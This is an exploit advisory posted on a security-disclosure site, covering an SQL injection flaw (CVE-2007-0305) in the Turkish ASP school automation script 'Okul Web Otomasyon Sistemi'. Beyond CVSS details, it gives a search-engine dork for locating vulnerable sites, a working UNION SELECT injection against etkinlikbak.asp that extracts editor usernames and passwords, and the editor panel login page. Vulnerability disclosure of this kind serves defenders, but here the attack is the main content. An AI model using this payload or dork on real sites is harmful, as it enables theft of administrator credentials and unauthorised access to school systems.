Bug: Okul Web Otomasyon Sistemi (etkinlikbak.asp) SQL Injection Vulnerability ( Ascii Version )

Search:
WLB2

Okul Web Otomasyon Sistemi (etkinlikbak.asp) SQL Injection Vulnerability

Published
Credit
Risk
2007.01.19
ilker Kandemir
Medium
CWE
CVE
Local
Remote
CWE-89
CVE-2007-0305
No
Yes

CVSS Base Score
Impact Subscore
Exploitability Subscore
7.5/10
6.4/10
10/10
Exploit range
Attack complexity
Authentication
Remote
Low
No required
Confidentiality impact
Integrity impact
Availability impact
Partial
Partial
Partial

------------------------------------------------------------------------
-------------------------------------------

AYYILDIZ.ORG PreSents...

Script: Okul Web Otomasyon Sistemi
Script Download: http://www.aspindir.com/Goster/3822

Contact: ilker Kandemir <ilkerkandemir[at]mynet.com>

DORK: inurl:etkinlikbak.asp

------------------------------------------------------------------------
-------------------------------------------

Exploit: etkinlikbak.asp?id=-1%20union%20select%200,editor,sifre,3,4,5%20from%20e
ditor

------------------------------------------------------------------------
-------------------------------------------
Editor Panel: editor_gir.asp
------------------------------------------------------------------------
-------------------------------------------

Tnx:H0tturk,Dr.Max Virus,Asianeagle,PcDelisi,CodeR
Special Tnx: AYYILDIZ.ORG

See this note in TXT Version

Bugtraq RSS
Bugtraq
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn
 
CVE RSS
CVEMAP

Copyright 2014, cxsecurity.com
Ascii Version